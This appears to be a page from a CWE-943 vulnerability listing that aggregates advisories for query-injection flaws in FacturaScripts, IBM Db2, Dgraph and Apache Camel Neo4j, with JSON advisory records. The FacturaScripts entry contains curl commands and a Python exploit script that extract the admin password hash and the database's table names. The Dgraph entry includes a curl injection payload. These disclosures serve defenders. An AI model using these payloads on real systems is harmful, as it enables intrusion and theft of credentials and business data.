Common Weakness Enumeration

CWE-943

Allowed-with-Review

Improper Neutralization of Special Elements in Data Query Logic

Abstraction: Class · Status: Incomplete

The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.

117 vulnerabilities reference this CWE, most recent first.

GHSA-PQQG-5F4F-8952

Vulnerability from github – Published: 2026-02-03 18:17 – Updated: 2026-02-04 21:57
VLAI
Summary
FacturaScripts has SQL Injection in Autocomplete Actions
Details

Summary

FacturaScripts contains a critical SQL Injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including user credentials, configuration settings, and all stored business data. The vulnerability exists in the CodeModel::all() method where user-supplied parameters are directly concatenated into SQL queries without sanitization or parameterized binding.


Details

Multiple controllers in FacturaScripts, including CopyModel, ListController, and PanelController, implement an autocomplete action that processes user input through the CodeModel::search() or CodeModel::all() methods. These methods construct SQL queries by directly concatenating user-controlled parameters without any validation or escaping.

Vulnerable Code Location

File: /Core/Model/CodeModel.php Method: all() Lines: 108-109

public static function all(string $tableName, string $fieldCode, string $fieldDescription, bool $addEmpty = true, array $where = []): array
{
    // ......

    // VULNERABLE CODE:
    $sql = 'SELECT DISTINCT ' . $fieldCode . ' AS code, ' . $fieldDescription . ' AS description '
        . 'FROM ' . $tableName . Where::multiSqlLegacy($where) . ' ORDER BY 2 ASC';
    foreach (self::db()->selectLimit($sql, self::getLimit()) as $row) {
        $result[] = new static($row);
    }

    return $result;
}

Vulnerable Parameters

The following parameters are vulnerable to SQL Injection:

  1. source → Maps to $tableName - Table name injection
  2. fieldcode → Maps to $fieldCode - Column name injection
  3. fieldtitle → Maps to $fieldDescription - Column name injection (Primary attack vector)

Attack Flow

  1. Attacker authenticates with valid credentials (any user role)
  2. Attacker sends POST request to /CopyModel with action=autocomplete
  3. Malicious SQL functions/queries are injected via the fieldtitle parameter
  4. Application executes the injected SQL and returns results in JSON format
  5. Attacker extracts sensitive data from the database

Proof of Concept (PoC)

Prerequisites

  • Valid authentication credentials (admin/admin in test instance)
  • Access to FacturaScripts web interface

Step-by-Step Manual Exploitation (CLI)

Since FacturaScripts uses MultiRequestProtection, a valid multireqtoken is required for every POST request.

1. Obtain initial token and session cookie: FacturaScripts redirects / to /login, so we use -L to follow redirects and -c to save the session cookie.

TOKEN=$(curl -s -L -c cookies.txt "http://localhost:8091/login" | grep -Po 'name="multireqtoken" value="\K[^"]+')
echo $TOKEN

2. Authenticate (Login): Use the saved cookie and the token to log in.

curl -s -b cookies.txt -c cookies.txt -X POST "http://localhost:8091/login" \
  -d "fsNick=admin" \
  -d "fsPassword=admin" \
  -d "action=login" \
  -d "multireqtoken=$TOKEN"

3. Extract Database Version: Obtain a fresh token for the next request and execute the injection.

# Get fresh token
TOKEN=$(curl -s -b cookies.txt "http://localhost:8091/CopyModel" | grep -Po 'name="multireqtoken" value="\K[^"]+')

# Execute SQLi
curl -s -b cookies.txt "http://localhost:8091/CopyModel" \
  -d "action=autocomplete" \
  -d "source=users" \
  -d "fieldcode=nick" \
  -d "fieldtitle=version()" \
  -d "term=admin" \
  -d "multireqtoken=$TOKEN"

4. Extract Database User and Name:

# Get fresh token
TOKEN=$(curl -s -b cookies.txt "http://localhost:8091/CopyModel" | grep -Po 'name="multireqtoken" value="\K[^"]+')

# Execute SQLi
curl -s -b cookies.txt "http://localhost:8091/CopyModel" \
  -d "action=autocomplete" \
  -d "source=users" \
  -d "fieldcode=nick" \
  -d "fieldtitle=concat(user(),' @ ',database())" \
  -d "term=admin" \
  -d "multireqtoken=$TOKEN"

5. Extract Admin Password Hash:

# Get fresh token
TOKEN=$(curl -s -b cookies.txt "http://localhost:8091/CopyModel" | grep -Po 'name="multireqtoken" value="\K[^"]+')

# Execute SQLi
curl -s -b cookies.txt "http://localhost:8091/CopyModel" \
  -d "action=autocomplete" \
  -d "source=users" \
  -d "fieldcode=nick" \
  -d "fieldtitle=password" \
  -d "term=admin" \
  -d "multireqtoken=$TOKEN"

Automated Exploitation Script

#!/usr/bin/env python3
"""
FacturaScripts SQL Injection Exploit - Autocomplete
Author: Łukasz Rybak
"""

import requests
import re
import json

# Configuration
BASE_URL = "http://localhost:8091"
USERNAME = "admin"
PASSWORD = "admin"

session = requests.Session()

def get_csrf_token(url):
    """Extract CSRF token from page"""
    response = session.get(url)
    match = re.search(r'name="multireqtoken" value="([^"]+)"', response.text)
    return match.group(1) if match else None

def login():
    """Authenticate to FacturaScripts"""
    print(f"[*] Logging in as {USERNAME}...")
    token = get_csrf_token(f"{BASE_URL}/login")
    if not token:
        print("[!] Failed to get CSRF token")
        exit()

    data = {
        "multireqtoken": token,
        "action": "login",
        "fsNick": USERNAME,
        "fsPassword": PASSWORD
    }
    response = session.post(f"{BASE_URL}/login", data=data)

    if "Dashboard" not in response.text:
        print("[!] Login failed!")
        exit()
    print("[+] Successfully logged in.")

def exploit_sqli(field_payload, term="admin", source="users", field_code="nick"):
    """Execute SQL injection through autocomplete"""
    data = {
        "action": "autocomplete",
        "source": source,
        "fieldcode": field_code,
        "fieldtitle": field_payload,
        "term": term
    }
    response = session.post(f"{BASE_URL}/CopyModel", data=data)
    try:
        return response.json()
    except:
        return None

def main():
    login()

    print("\n" + "="*60)
    print(" EXPLOITING SQL INJECTION IN AUTOCOMPLETE ")
    print("="*60 + "\n")

    # 1. Database version
    print("[*] Extracting database version...")
    res = exploit_sqli("version()")
    if res:
        print(f"[+] Database Version: {res[0]['value']}")

    # 2. Current user and database
    print("[*] Extracting DB user and database name...")
    res = exploit_sqli("concat(user(),' @ ',database())")
    if res:
        print(f"[+] DB User @ Database: {res[0]['value']}")

    # 3. Admin password hash
    print("[*] Extracting admin password hash...")
    res = exploit_sqli("password", term="admin")
    if res:
        print(f"[+] Admin Password Hash: {res[0]['value']}")

    # 4. All table names
    print("[*] Extracting table names...")
    res = exploit_sqli("(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())")
    if res:
        print(f"[+] Tables: {res[0]['value']}")

    print("\n[+] Exploitation complete!")

if __name__ == "__main__":
    main()

image


Impact

This SQL injection vulnerability has CRITICAL impact:

Data Confidentiality

  • Complete database disclosure - Attacker can extract all data including:
  • User credentials (password hashes)
  • Customer information (names, addresses, tax IDs, etc.)
  • Financial records (invoices, payments, bank details)
  • Business logic and configuration data
  • Plugin and system settings

Who is Impacted?

  • All FacturaScripts installations running vulnerable versions
  • All authenticated users can exploit (not just admins)
  • Businesses using FacturaScripts for accounting/invoicing
  • Customers whose data is stored in the system

Recommended Fix

Immediate Remediation

Option 1: Use Prepared Statements

// File: Core/Model/CodeModel.php
// Method: all()

public static function all(string $tableName, string $fieldCode, string $fieldDescription, bool $addEmpty = true, array $where = []): array
{
    // ... validation code ...

    // Validate and escape identifiers
    $safeTableName = self::db()->escapeColumn($tableName);
    $safeFieldCode = self::db()->escapeColumn($fieldCode);
    $safeFieldDescription = self::db()->escapeColumn($fieldDescription);

    // Use parameterized query
    $sql = 'SELECT DISTINCT ' . $safeFieldCode . ' AS code, ' . $safeFieldDescription . ' AS description '
        . 'FROM ' . $safeTableName . Where::multiSqlLegacy($where) . ' ORDER BY 2 ASC';

    foreach (self::db()->selectLimit($sql, self::getLimit()) as $row) {
        $result[] = new static($row);
    }

    return $result;
}

Credits

Discovered by: Łukasz Rybak

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "facturascripts/facturascripts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2025.81"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25514"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-89",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-03T18:17:24Z",
    "nvd_published_at": "2026-02-04T20:16:08Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n**FacturaScripts contains a critical SQL Injection vulnerability in the autocomplete functionality** that allows authenticated attackers to extract sensitive data from the database including user credentials, configuration settings, and all stored business data. The vulnerability exists in the `CodeModel::all()` method where user-supplied parameters are directly concatenated into SQL queries without sanitization or parameterized binding.\n\n---\n\n### Details\n\nMultiple controllers in FacturaScripts, including `CopyModel`, `ListController`, and `PanelController`, implement an autocomplete action that processes user input through the `CodeModel::search()` or `CodeModel::all()` methods. These methods construct SQL queries by directly concatenating user-controlled parameters without any validation or escaping.\n\n#### Vulnerable Code Location\n\n**File:** `/Core/Model/CodeModel.php`\n**Method:** `all()`\n**Lines:** 108-109\n\n```php\npublic static function all(string $tableName, string $fieldCode, string $fieldDescription, bool $addEmpty = true, array $where = []): array\n{\n    // ......\n\n    // VULNERABLE CODE:\n    $sql = \u0027SELECT DISTINCT \u0027 . $fieldCode . \u0027 AS code, \u0027 . $fieldDescription . \u0027 AS description \u0027\n        . \u0027FROM \u0027 . $tableName . Where::multiSqlLegacy($where) . \u0027 ORDER BY 2 ASC\u0027;\n    foreach (self::db()-\u003eselectLimit($sql, self::getLimit()) as $row) {\n        $result[] = new static($row);\n    }\n\n    return $result;\n}\n```\n\n#### Vulnerable Parameters\n\nThe following parameters are vulnerable to SQL Injection:\n\n1. **`source`** \u2192 Maps to `$tableName` - Table name injection\n2. **`fieldcode`** \u2192 Maps to `$fieldCode` - Column name injection\n3. **`fieldtitle`** \u2192 Maps to `$fieldDescription` - Column name injection (Primary attack vector)\n\n#### Attack Flow\n\n1. Attacker authenticates with valid credentials (any user role)\n2. Attacker sends POST request to `/CopyModel` with `action=autocomplete`\n3. Malicious SQL functions/queries are injected via the `fieldtitle` parameter\n4. Application executes the injected SQL and returns results in JSON format\n5. Attacker extracts sensitive data from the database\n\n---\n\n### Proof of Concept (PoC)\n\n#### Prerequisites\n- Valid authentication credentials (admin/admin in test instance)\n- Access to FacturaScripts web interface\n\n#### Step-by-Step Manual Exploitation (CLI)\n\nSince FacturaScripts uses `MultiRequestProtection`, a valid `multireqtoken` is required for every POST request.\n\n**1. Obtain initial token and session cookie:**\nFacturaScripts redirects `/` to `/login`, so we use `-L` to follow redirects and `-c` to save the session cookie.\n```bash\nTOKEN=$(curl -s -L -c cookies.txt \"http://localhost:8091/login\" | grep -Po \u0027name=\"multireqtoken\" value=\"\\K[^\"]+\u0027)\necho $TOKEN\n```\n\n**2. Authenticate (Login):**\nUse the saved cookie and the token to log in.\n```bash\ncurl -s -b cookies.txt -c cookies.txt -X POST \"http://localhost:8091/login\" \\\n  -d \"fsNick=admin\" \\\n  -d \"fsPassword=admin\" \\\n  -d \"action=login\" \\\n  -d \"multireqtoken=$TOKEN\"\n```\n\n**3. Extract Database Version:**\nObtain a fresh token for the next request and execute the injection.\n```bash\n# Get fresh token\nTOKEN=$(curl -s -b cookies.txt \"http://localhost:8091/CopyModel\" | grep -Po \u0027name=\"multireqtoken\" value=\"\\K[^\"]+\u0027)\n\n# Execute SQLi\ncurl -s -b cookies.txt \"http://localhost:8091/CopyModel\" \\\n  -d \"action=autocomplete\" \\\n  -d \"source=users\" \\\n  -d \"fieldcode=nick\" \\\n  -d \"fieldtitle=version()\" \\\n  -d \"term=admin\" \\\n  -d \"multireqtoken=$TOKEN\"\n```\n\n**4. Extract Database User and Name:**\n```bash\n# Get fresh token\nTOKEN=$(curl -s -b cookies.txt \"http://localhost:8091/CopyModel\" | grep -Po \u0027name=\"multireqtoken\" value=\"\\K[^\"]+\u0027)\n\n# Execute SQLi\ncurl -s -b cookies.txt \"http://localhost:8091/CopyModel\" \\\n  -d \"action=autocomplete\" \\\n  -d \"source=users\" \\\n  -d \"fieldcode=nick\" \\\n  -d \"fieldtitle=concat(user(),\u0027 @ \u0027,database())\" \\\n  -d \"term=admin\" \\\n  -d \"multireqtoken=$TOKEN\"\n```\n\n**5. Extract Admin Password Hash:**\n```bash\n# Get fresh token\nTOKEN=$(curl -s -b cookies.txt \"http://localhost:8091/CopyModel\" | grep -Po \u0027name=\"multireqtoken\" value=\"\\K[^\"]+\u0027)\n\n# Execute SQLi\ncurl -s -b cookies.txt \"http://localhost:8091/CopyModel\" \\\n  -d \"action=autocomplete\" \\\n  -d \"source=users\" \\\n  -d \"fieldcode=nick\" \\\n  -d \"fieldtitle=password\" \\\n  -d \"term=admin\" \\\n  -d \"multireqtoken=$TOKEN\"\n```\n\n#### Automated Exploitation Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nFacturaScripts SQL Injection Exploit - Autocomplete\nAuthor: \u0141ukasz Rybak\n\"\"\"\n\nimport requests\nimport re\nimport json\n\n# Configuration\nBASE_URL = \"http://localhost:8091\"\nUSERNAME = \"admin\"\nPASSWORD = \"admin\"\n\nsession = requests.Session()\n\ndef get_csrf_token(url):\n    \"\"\"Extract CSRF token from page\"\"\"\n    response = session.get(url)\n    match = re.search(r\u0027name=\"multireqtoken\" value=\"([^\"]+)\"\u0027, response.text)\n    return match.group(1) if match else None\n\ndef login():\n    \"\"\"Authenticate to FacturaScripts\"\"\"\n    print(f\"[*] Logging in as {USERNAME}...\")\n    token = get_csrf_token(f\"{BASE_URL}/login\")\n    if not token:\n        print(\"[!] Failed to get CSRF token\")\n        exit()\n\n    data = {\n        \"multireqtoken\": token,\n        \"action\": \"login\",\n        \"fsNick\": USERNAME,\n        \"fsPassword\": PASSWORD\n    }\n    response = session.post(f\"{BASE_URL}/login\", data=data)\n\n    if \"Dashboard\" not in response.text:\n        print(\"[!] Login failed!\")\n        exit()\n    print(\"[+] Successfully logged in.\")\n\ndef exploit_sqli(field_payload, term=\"admin\", source=\"users\", field_code=\"nick\"):\n    \"\"\"Execute SQL injection through autocomplete\"\"\"\n    data = {\n        \"action\": \"autocomplete\",\n        \"source\": source,\n        \"fieldcode\": field_code,\n        \"fieldtitle\": field_payload,\n        \"term\": term\n    }\n    response = session.post(f\"{BASE_URL}/CopyModel\", data=data)\n    try:\n        return response.json()\n    except:\n        return None\n\ndef main():\n    login()\n\n    print(\"\\n\" + \"=\"*60)\n    print(\" EXPLOITING SQL INJECTION IN AUTOCOMPLETE \")\n    print(\"=\"*60 + \"\\n\")\n\n    # 1. Database version\n    print(\"[*] Extracting database version...\")\n    res = exploit_sqli(\"version()\")\n    if res:\n        print(f\"[+] Database Version: {res[0][\u0027value\u0027]}\")\n\n    # 2. Current user and database\n    print(\"[*] Extracting DB user and database name...\")\n    res = exploit_sqli(\"concat(user(),\u0027 @ \u0027,database())\")\n    if res:\n        print(f\"[+] DB User @ Database: {res[0][\u0027value\u0027]}\")\n\n    # 3. Admin password hash\n    print(\"[*] Extracting admin password hash...\")\n    res = exploit_sqli(\"password\", term=\"admin\")\n    if res:\n        print(f\"[+] Admin Password Hash: {res[0][\u0027value\u0027]}\")\n\n    # 4. All table names\n    print(\"[*] Extracting table names...\")\n    res = exploit_sqli(\"(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())\")\n    if res:\n        print(f\"[+] Tables: {res[0][\u0027value\u0027]}\")\n\n    print(\"\\n[+] Exploitation complete!\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\u003cimg width=\"2524\" height=\"410\" alt=\"image\" src=\"https://github.com/user-attachments/assets/19178918-0b83-4b94-a41d-38f33b034f5d\" /\u003e\n\n---\n\n### Impact\n\nThis SQL injection vulnerability has **CRITICAL** impact:\n\n#### Data Confidentiality\n- **Complete database disclosure** - Attacker can extract all data including:\n  - User credentials (password hashes)\n  - Customer information (names, addresses, tax IDs, etc.)\n  - Financial records (invoices, payments, bank details)\n  - Business logic and configuration data\n  - Plugin and system settings\n\n#### Who is Impacted?\n- **All FacturaScripts installations** running vulnerable versions\n- **All authenticated users** can exploit (not just admins)\n- **Businesses using FacturaScripts** for accounting/invoicing\n- **Customers whose data is stored** in the system\n\n---\n\n### Recommended Fix\n\n#### Immediate Remediation\n\n**Option 1: Use Prepared Statements**\n\n```php\n// File: Core/Model/CodeModel.php\n// Method: all()\n\npublic static function all(string $tableName, string $fieldCode, string $fieldDescription, bool $addEmpty = true, array $where = []): array\n{\n    // ... validation code ...\n\n    // Validate and escape identifiers\n    $safeTableName = self::db()-\u003eescapeColumn($tableName);\n    $safeFieldCode = self::db()-\u003eescapeColumn($fieldCode);\n    $safeFieldDescription = self::db()-\u003eescapeColumn($fieldDescription);\n\n    // Use parameterized query\n    $sql = \u0027SELECT DISTINCT \u0027 . $safeFieldCode . \u0027 AS code, \u0027 . $safeFieldDescription . \u0027 AS description \u0027\n        . \u0027FROM \u0027 . $safeTableName . Where::multiSqlLegacy($where) . \u0027 ORDER BY 2 ASC\u0027;\n\n    foreach (self::db()-\u003eselectLimit($sql, self::getLimit()) as $row) {\n        $result[] = new static($row);\n    }\n\n    return $result;\n}\n```\n### Credits\n\n**Discovered by:** \u0141ukasz Rybak",
  "id": "GHSA-pqqg-5f4f-8952",
  "modified": "2026-02-04T21:57:23Z",
  "published": "2026-02-03T18:17:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-pqqg-5f4f-8952"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25514"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NeoRazorX/facturascripts/commit/5c070f82665b98efd2f914a4769c6dc9415f5b0f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NeoRazorX/facturascripts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FacturaScripts has SQL Injection in Autocomplete Actions"
}

GHSA-PWHP-4QXF-7FF6

Vulnerability from github – Published: 2024-08-14 18:32 – Updated: 2025-11-04 18:31
VLAI
Details

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user. IBM X-Force ID: 287614.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-31882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-14T18:15:10Z",
    "severity": "MODERATE"
  },
  "details": "IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user.  IBM X-Force ID:  287614.",
  "id": "GHSA-pwhp-4qxf-7ff6",
  "modified": "2025-11-04T18:31:17Z",
  "published": "2024-08-14T18:32:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31882"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/287614"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20240912-0003"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7165338"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q2M9-6JP9-C6MC

Vulnerability from github – Published: 2026-06-29 22:53 – Updated: 2026-06-29 22:53
VLAI
Summary
Dgraph Vulnerable to DQL Injection via checkUserPassword GraphQL Query
Details

Summary

The checkUserPassword GraphQL query in Dgraph is vulnerable to DQL (Dgraph Query Language) injection. User-supplied password values are interpolated directly into a DQL checkpwd() query via fmt.Sprintf without any escaping or parameterization. An attacker can inject a password containing a double-quote character to break out of the DQL string literal and append arbitrary DQL query blocks.

Details

Vulnerable Code Path

The vulnerability exists in the GraphQL-to-DQL query rewriting layer:

  1. query_rewriter.go (~line 364) — The checkpwd() DQL function is constructed using fmt.Sprintf:

go fmt.Sprintf(`checkpwd(User.password, "%s")`, password)

The raw password string from the GraphQL query input is embedded directly into the DQL query without escaping double quotes or other special characters.

  1. graphquery.go — The constructed query attribute is serialized into the final DQL string via b.WriteString(query.Attr), passing the unsanitized content directly to the Dgraph query engine.

Attack Mechanism

A password value containing a double-quote (") terminates the string literal in the checkpwd() function. Any content after the escaped quote is parsed as additional DQL, allowing the attacker to inject arbitrary query blocks.

Distinction from CVE-2026-41328 and CVE-2026-41327

CVE-2026-41328 and CVE-2026-41327 address DQL injection in edgraph/server.go, where GraphQL mutation inputs (upsert/delete) are embedded unsafely into DQL mutations. Those fixes sanitize the mutation path.

This vulnerability is in a completely different code path — the GraphQL query rewriter (query_rewriter.gographquery.go). The checkUserPassword GraphQL query triggers a DQL query via checkpwd(), and this query construction was not covered by the patches for CVE-2026-41328/CVE-2026-41327.

PoC

curl -s -X POST http://TARGET:8080/graphql \
  -H "Content-Type: application/json" \
  -d '{ "query": "query { checkUserPassword(name: \"admin\", password: \"x\\\") { uid } injected(func: has(User.name)) { User.name User.email } dummy(func: eq(x, \\\"x\") { msg } }") { msg } }" }'

What to observe:

  • The touched_uids field in the extensions section of the response will be elevated (indicating the injected blocks executed)
  • Dgraph server logs (dgraph alpha output) will show the injected query blocks being parsed and executed
  • The response itself may be filtered by the GraphQL layer, but server-side execution is confirmed

Impact

  • Data enumeration: Injected query blocks execute server-side and can probe for the existence of predicates, types, and nodes via touched_uids metrics and server logs.
  • Schema discovery: An attacker can enumerate all predicates and types in the database by injecting schema {} blocks or has() queries.
  • Resource exhaustion: Expensive injected queries (recursive traversals, large aggregations) execute at the DQL layer, consuming server resources regardless of whether results are returned to the attacker.
  • Potential data disclosure: Depending on Dgraph configuration (e.g., debug mode, custom extensions), injected query results may leak into the response.

CVSS 3.1: 7.5 HighAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Network-accessible via any GraphQL endpoint
  • No authentication required (checkUserPassword is an unauthenticated query)
  • Low attack complexity (single crafted HTTP request)
  • High confidentiality impact (server-side query execution confirmed, data enumeration possible)

Affected Versions

All versions of Dgraph that include GraphQL support with the @secret directive are affected:

  • <= v25.3.3
  • Any version where query_rewriter.go constructs checkpwd() via string interpolation

Suggested Fix

Escape or parameterize the password value before embedding it in the DQL query. At minimum, double-quote characters in the password must be escaped:

// Before (vulnerable):
fmt.Sprintf(`checkpwd(User.password, "%s")`, password)

// After (escaped):
escaped := strings.ReplaceAll(password, `\`, `\\`)
escaped = strings.ReplaceAll(escaped, `"`, `\"`)
fmt.Sprintf(`checkpwd(User.password, "%s")`, escaped)

Ideally, Dgraph should implement parameterized query support for the checkpwd() function to avoid string interpolation entirely, consistent with best practices for injection prevention.

Credit

Kai Aizen (kai.aizen.dev@gmail.com)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 25.3.3"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph/v25"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "25.3.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44840"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-29T22:53:52Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `checkUserPassword` GraphQL query in Dgraph is vulnerable to DQL (Dgraph Query Language) injection. User-supplied password values are interpolated directly into a DQL `checkpwd()` query via `fmt.Sprintf` without any escaping or parameterization. An attacker can inject a password containing a double-quote character to break out of the DQL string literal and append arbitrary DQL query blocks.\n\n## Details\n\n### Vulnerable Code Path\n\nThe vulnerability exists in the GraphQL-to-DQL query rewriting layer:\n\n1. **`query_rewriter.go` (~line 364)** \u2014 The `checkpwd()` DQL function is constructed using `fmt.Sprintf`:\n\n   ```go\n   fmt.Sprintf(`checkpwd(User.password, \"%s\")`, password)\n   ```\n\n   The raw password string from the GraphQL query input is embedded directly into the DQL query without escaping double quotes or other special characters.\n\n2. **`graphquery.go`** \u2014 The constructed query attribute is serialized into the final DQL string via `b.WriteString(query.Attr)`, passing the unsanitized content directly to the Dgraph query engine.\n\n### Attack Mechanism\n\nA password value containing a double-quote (`\"`) terminates the string literal in the `checkpwd()` function. Any content after the escaped quote is parsed as additional DQL, allowing the attacker to inject arbitrary query blocks.\n\n### Distinction from CVE-2026-41328 and CVE-2026-41327\n\nCVE-2026-41328 and CVE-2026-41327 address DQL injection in **`edgraph/server.go`**, where GraphQL mutation inputs (upsert/delete) are embedded unsafely into DQL mutations. Those fixes sanitize the mutation path.\n\nThis vulnerability is in a **completely different code path** \u2014 the **GraphQL query rewriter** (`query_rewriter.go` \u2192 `graphquery.go`). The `checkUserPassword` GraphQL query triggers a DQL *query* via `checkpwd()`, and this query construction was not covered by the patches for CVE-2026-41328/CVE-2026-41327.\n\n## PoC\n\n```bash\ncurl -s -X POST http://TARGET:8080/graphql \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{ \"query\": \"query { checkUserPassword(name: \\\"admin\\\", password: \\\"x\\\\\\\") { uid } injected(func: has(User.name)) { User.name User.email } dummy(func: eq(x, \\\\\\\"x\\\") { msg } }\") { msg } }\" }\u0027\n```\n\n**What to observe:**\n\n- The `touched_uids` field in the `extensions` section of the response will be elevated (indicating the injected blocks executed)\n- Dgraph server logs (`dgraph alpha` output) will show the injected query blocks being parsed and executed\n- The response itself may be filtered by the GraphQL layer, but server-side execution is confirmed\n\n## Impact\n\n- **Data enumeration**: Injected query blocks execute server-side and can probe for the existence of predicates, types, and nodes via `touched_uids` metrics and server logs.\n- **Schema discovery**: An attacker can enumerate all predicates and types in the database by injecting `schema {}` blocks or `has()` queries.\n- **Resource exhaustion**: Expensive injected queries (recursive traversals, large aggregations) execute at the DQL layer, consuming server resources regardless of whether results are returned to the attacker.\n- **Potential data disclosure**: Depending on Dgraph configuration (e.g., debug mode, custom extensions), injected query results may leak into the response.\n\n**CVSS 3.1: 7.5 High** \u2014 `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`\n\n- Network-accessible via any GraphQL endpoint\n- No authentication required (`checkUserPassword` is an unauthenticated query)\n- Low attack complexity (single crafted HTTP request)\n- High confidentiality impact (server-side query execution confirmed, data enumeration possible)\n\n## Affected Versions\n\nAll versions of Dgraph that include GraphQL support with the `@secret` directive are affected:\n\n- \u003c= v25.3.3\n- Any version where `query_rewriter.go` constructs `checkpwd()` via string interpolation\n\n## Suggested Fix\n\nEscape or parameterize the password value before embedding it in the DQL query. At minimum, double-quote characters in the password must be escaped:\n\n```go\n// Before (vulnerable):\nfmt.Sprintf(`checkpwd(User.password, \"%s\")`, password)\n\n// After (escaped):\nescaped := strings.ReplaceAll(password, `\\`, `\\\\`)\nescaped = strings.ReplaceAll(escaped, `\"`, `\\\"`)\nfmt.Sprintf(`checkpwd(User.password, \"%s\")`, escaped)\n```\n\nIdeally, Dgraph should implement parameterized query support for the `checkpwd()` function to avoid string interpolation entirely, consistent with best practices for injection prevention.\n\n## Credit\n\nKai Aizen (kai.aizen.dev@gmail.com)",
  "id": "GHSA-q2m9-6jp9-c6mc",
  "modified": "2026-06-29T22:53:52Z",
  "published": "2026-06-29T22:53:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-q2m9-6jp9-c6mc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/commit/cee702c93f141eeb0c96a81f70830ec9e459efac"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dgraph-io/dgraph"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/releases/tag/v25.3.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dgraph Vulnerable to DQL Injection via checkUserPassword GraphQL Query"
}

GHSA-Q86M-QJPM-VQCW

Vulnerability from github – Published: 2026-07-06 09:30 – Updated: 2026-07-06 21:30
VLAI
Details

Improper Neutralization of Special Elements in Data Query Logic vulnerability in Apache Camel Neo4J component.

The camel-neo4j producer builds the Cypher WHERE clause for its match/retrieve and delete operations from the CamelNeo4jMatchProperties map. CVE-2025-66169 addressed Cypher injection through the property values by binding them as query parameters ($paramN), but the property names (the JSON keys of that map) were still concatenated into the query string verbatim in Neo4jProducer.retrieveNodes() and deleteNode(). A property name containing Cypher syntax therefore alters the structure of the executed query. Where a route maps untrusted input into the CamelNeo4jMatchProperties map - for example by passing a request body as the match map, or from a consumer that does not filter inbound Camel* headers - an attacker who controls the JSON key names can inject arbitrary Cypher and read, modify or delete any node or relationship in the Neo4j database. The CamelNeo4jMatchProperties header is itself Camel-prefixed and is filtered by the HTTP header-filter strategy, so a plain HTTP client cannot set it directly; the issue is reachable through routes that deliberately or inadvertently carry untrusted data into that header. This issue affects Apache Camel: from 4.10.0 before 4.14.8, from 4.15.0 before 4.18.3, from 4.19.0 before 4.21.0.

Users are recommended to upgrade to version 4.21.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.8. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.3. For deployments that cannot upgrade immediately, do not populate the CamelNeo4jMatchProperties map from untrusted input: validate or allow-list the property names (for example against ^[A-Za-z_][A-Za-z0-9_]$) before the Neo4j producer, and ensure that any consumer feeding such a route filters inbound Camel / camel* headers so the match header cannot be supplied by an external sender.

